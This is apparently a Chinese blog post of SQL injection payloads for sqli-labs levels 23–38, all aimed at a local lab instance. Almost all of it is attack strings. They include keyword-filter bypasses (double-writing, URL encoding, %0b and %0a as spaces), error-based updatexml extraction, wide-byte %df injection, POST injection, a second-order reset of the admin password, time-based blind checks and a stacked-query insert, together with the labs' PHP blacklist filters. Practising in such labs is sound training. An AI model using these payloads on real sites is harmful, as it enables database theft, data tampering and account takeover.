Sqli-labs靶场payload（23-38进阶篇）原创

本文主要是介绍Sqli-labs靶场payload（23-38进阶篇）原创，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

T23 单引号闭合 --+ #过滤所以可以尝试补全的方法

127.0.0.1/sqli-labs/Less-23/?id=1' or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,2,3 or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,database(),3 or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema="security" or '1'='1
127.0.0.1/sqli-labs/Less-23/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" or '1'='1

T24 密码重置越权漏洞

Desired Username:admin' #

Password:123

Retype Password:123

then-->Login

Change Password

Current Password:123

New Password:123456

Retype Password:123456

then Logout

Username:admin

Password:123456

Login Successfully!

T25 单引号闭合屏蔽内容：or and

http://127.0.0.1/sqli-labs/Less-25/?id=1' --+
http://127.0.0.1/sqli-labs/Less-25/?id=1' order by 3 --+   //屏蔽了or
http://127.0.0.1/sqli-labs/Less-25/?id=1' oRder by 3 --+   //大小写绕过失败
http://127.0.0.1/sqli-labs/Less-25/?id=1' oorrder by 3 --+   //双写绕过成功
127.0.0.1/sqli-labs/Less-25/?id=-1' union select 1,2,3 --+
127.0.0.1/sqli-labs/Less-25/?id=-1' union select 1,database(),3 --+
http://127.0.0.1/sqli-labs/Less-25/?id=1' or '1'='1   //屏蔽了or
http://127.0.0.1/sqli-labs/Less-25/?id=1' || '1'='1   //绕过成功
http://127.0.0.1/sqli-labs/Less-25/?id=-1' union select 1,database(),3 || '1'='1
http://127.0.0.1/sqli-labs/Less-25/?id=1' and '1'='1  //屏蔽了and
http://127.0.0.1/sqli-labs/Less-25/?id=1' && '1'='1  //屏蔽了&&
http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd '1'='1   //双写绕过成功
http://127.0.0.1/sqli-labs/Less-25/?id=1' %26%26 '1'='1   //url编码绕过成功

T25a 屏蔽# 数字型 and or过滤

and 1=2 会报错的说明是数字型 不报错的是字符型  数字型不用闭合 所以逻辑语句有意义 字符型在没有闭合的情况下 输入的内容都是字符类型 不具有逻辑判断功能
http://127.0.0.1/sqli-labs/Less-25a/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-25a/?id=1 anandd 1=2   //报错 说明是数字型
http://127.0.0.1/sqli-labs/Less-25a/?id=1 oorrder by 3
http://127.0.0.1/sqli-labs/Less-25a/?id=-1 union select 1,2,3
http://127.0.0.1/sqli-labs/Less-25a/?id=-1 union select 1,database(),3

T26 单引号闭合屏蔽了空格屏蔽了注释符 or and 也屏蔽了减号所以id只能写很大来报错

http://127.0.0.1/sqli-labs/Less-26/?id=1' or '1'='1   //屏蔽了or 和空格
http://127.0.0.1/sqli-labs/Less-26/?id=1' || '1'='1   //成功绕过or 还剩空格限制
http://127.0.0.1/sqli-labs/Less-26/?id=1'order by 4||'1'='1  //order被过滤掉了or 同时空格被过滤掉了
http://127.0.0.1/sqli-labs/Less-26/?id=1'oorrder by 4||'1'='1  //双写绕过order过滤 还剩空格
http://127.0.0.1/sqli-labs/Less-26/?id=1'oorrder%09by%094||'1'='1  //特殊编码%09绕过失败
有待补充空格绕过方法
id=1'
id=1%27||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database())),0x7e),1))||1=%27
id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(database())),0x7e),1))||'1'='1
id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema,tables)where(table_schema)like(database())),0x7e),1))||'1'='1

T26a 屏蔽注释符屏蔽减号屏蔽or（大小写or绕过无效）屏蔽and 屏蔽&& 不屏蔽|| 屏蔽空格闭合方式('')

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

function blacklist($id)

{

    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)

    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)

    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*

    $id= preg_replace('/[--]/',"", $id);        //Strip out --

    $id= preg_replace('/[#]/',"", $id);            //Strip out #

    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces

    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces

    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes

    return $id;

}

http://127.0.0.1/sqli-labs/Less-26a/?id=3' ||'  闭合错误
http://127.0.0.1/sqli-labs/Less-26a/?id=3') ||('   闭合成功！
http://127.0.0.1/sqli-labs/Less-26a/?id=3') oorrder by 3 ||('    //Hint: Your Input is Filtered with following result: 3')orderby3||('
http://127.0.0.1/sqli-labs/Less-26a/?id=3')union select 1,2,3||('    //result: 3')unionselect1,2,3||('
//可能由于环境问题 windows下无法绕过空格 只能想办法构造无空格的语句
http://127.0.0.1/sqli-labs/Less-26a/?id=3')anandd('')||('
http://127.0.0.1/sqli-labs/Less-26a/?id=3')anandd('updatexml(1,concat(0x7e,(select(database())),0x7e),1)')||('    //报错方式没有回显
http://127.0.0.1/sqli-labs/Less-26a/?id=300000')oorr('updatexml(1,concat(0x7e,(select(database())),0x7e),1)')||('   //报错方式没有回显
接下来尝试盲注方式
http://127.0.0.1/sqli-labs/Less-26a/?id=300000')oorr('(if(length(database())=8,1,sleep(5)))')||('

T27 单引号闭合屏蔽了减号注释符空格

http://127.0.0.1/sqli-labs/Less-27/?id=1' --+  //屏蔽了减号
http://127.0.0.1/sqli-labs/Less-27/?id=1' or '1'='1  //屏蔽了空格
http://127.0.0.1/sqli-labs/Less-27/?id=1' union select 1,2,3 or '1'='1  //屏蔽了空格和union select
http://127.0.0.1/sqli-labs/Less-27/?id=1' uNion sElect 1,2,3 or '1'='1  //union select大小写绕过成功
http://127.0.0.1/sqli-labs/Less-27/?id=1' ununionion seselectlect 1,2,3 or '1'='1  //双写绕过union成功 select失败
http://127.0.0.1/sqli-labs/Less-27/?id=100000'%0buNion%0bsElect%0b1,2,3%0bor%0b'1'='1  // %0b绕过空格成功大小写绕过union select屏蔽成功！
http://127.0.0.1/sqli-labs/Less-27/?id=100000'%0buNion%0bsElect%0b1,database(),3%0bor%0b'1'='1
http://127.0.0.1/sqli-labs/Less-27/?id=100000'%0buNion%0bsElect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema="security"%0bor%0b'1'='1
http://127.0.0.1/sqli-labs/Less-27/?id=300000'%0buNion%0bsElEct%0b1,2,3 ||'1'='1

T27a 屏蔽空格屏蔽注释符没屏蔽and和or 屏蔽select 是双引号闭合则直接闭合语句

function blacklist($id)

{

$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*

$id= preg_replace('/[--]/',"", $id);        //Strip out --.

$id= preg_replace('/[#]/',"", $id);            //Strip out #.

$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.

$id= preg_replace('/select/m',"", $id);        //Strip out spaces.

$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.

$id= preg_replace('/union/s',"", $id);        //Strip out union

$id= preg_replace('/select/s',"", $id);        //Strip out select

$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION

$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT

$id= preg_replace('/Union/s',"", $id);        //Strip out Union

$id= preg_replace('/Select/s',"", $id);        //Strip out Select

return $id;

}

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

http://127.0.0.1/sqli-labs/Less-27a/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-27a/?id=1%0band%0b1=2
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,2,3||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,database(),3||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,database(),3||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000" %0auniOn%0aSEleCT%0a1,group_concat(table_name),3 from information_schema.tables where table_schema=database()||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000"%0a%0auniOn%0aSEleCT%0a1,group_concat(table_name),3%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||"1"="1
http://127.0.0.1/sqli-labs/Less-27a/?id=20000"%0buniOn%0bsElect%0b1,2,3%0bor"1"="1

★T28 单引号闭合屏蔽了空格，--+ # 屏蔽方法：union select同时出现一起屏蔽不单独屏蔽

http://127.0.0.1/sqli-labs/Less-28/?id=2')or('
http://127.0.0.1/sqli-labs/Less-28/?id=2000') union select 1,2,3 or('
http://127.0.0.1/sqli-labs/Less-28/?id=2000')%0bunion%0bunion%0bselect%0bselect%0b1,2,3%0bor('
http://127.0.0.1/sqli-labs/Less-28/?id=2000')%0bunion%0bunion%0bselect%0bselect%0b1,group_concat(table_name),3 from information_schema.tables where table_schema="security" %0bor('
http://127.0.0.1/sqli-labs/Less-28/?id=2000')%0bunion%0bunion%0bselect%0bselect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema="security"%0b%0bor('
http://127.0.0.1/sqli-labs/Less-28/?id=20000')%0bunion%0bunion%0bselect%0bselect%0b1,2,3%0bor%0b('1')=('1

T28a union select屏蔽屏蔽# 不屏蔽--+ 闭合是('')

经验：order by能报错才是正确的闭合有时候双引号也能正确但是并不是正确的闭合双引号后面不会执行

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
http://127.0.0.1/sqli-labs/Less-28a/?id=1 and 1=2   //没有报错 说明不是数字型
http://127.0.0.1/sqli-labs/Less-28a/?id=2" #  //找到闭合为双引号
http://127.0.0.1/sqli-labs/Less-28a/?id=2') order by 3--+
http://127.0.0.1/sqli-labs/Less-28a/?id=-2') union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-28a/?id=-2')union union select select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-28a/?id=-2')union union select select 1,database(),3 --+

T29-T31暂时不做

T32 宽字节注入单引号闭合

http://127.0.0.1/sqli-labs/Less-32/?id=1'--+  //单引号被反斜杠注释了
http://127.0.0.1/sqli-labs/Less-32/?id=1%df'--+
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' order by 3 --+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df' union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema ="security" --+  //security的两个引号被过滤了
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =0x7365637572697479 --+

T33 宽字节注入单引号闭合和T32一致

http://127.0.0.1/sqli-labs/Less-33/?id=1%df'--+
http://127.0.0.1/sqli-labs/Less-33/?id=1%df' order by 3 --+
http://127.0.0.1/sqli-labs/Less-33/?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =0x7365637572697479 --+

T34 POST注入之宽字节注入单引号闭合

uname=admin%df' #&passwd=admin&submit=Submit
uname=admin%df'order by 2 #&passwd=admin&submit=Submit
uname=adn%df' union select 1,2 #&passwd=admin&submit=Submit
uname=adn%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 #&passwd=admin&submit=Submit

T35 数字型注入+宽字节注入无需闭合

http://127.0.0.1/sqli-labs/Less-35/?id=1 and 1=1
http://127.0.0.1/sqli-labs/Less-35/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-35/?id=-1 union select 1,2,3
http://127.0.0.1/sqli-labs/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479

T36 宽字节注入单引号闭合

http://127.0.0.1/sqli-labs/Less-36/?id=1%df' --+
http://127.0.0.1/sqli-labs/Less-36/?id=1%df' order by 3 --+
http://127.0.0.1/sqli-labs/Less-36/?id=-1%df' union select 1,2,3 --+
http://127.0.0.1/sqli-labs/Less-36/?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

T37 POST注入宽字节注入

uname=admin%df' #&passwd=aa&submit=Submit
uname=admin%df' order by 2 #&passwd=aa&submit=Submit
uname=ain%df' union select 1,2 #&passwd=aa&submit=Submit
uname=ain%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 #&passwd=aa&submit=Submit

T38 堆叠查询注入

http://127.0.0.1/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values(70,'zjzj','hahaha') --+
http://127.0.0.1/sqli-labs/Less-38/?id=70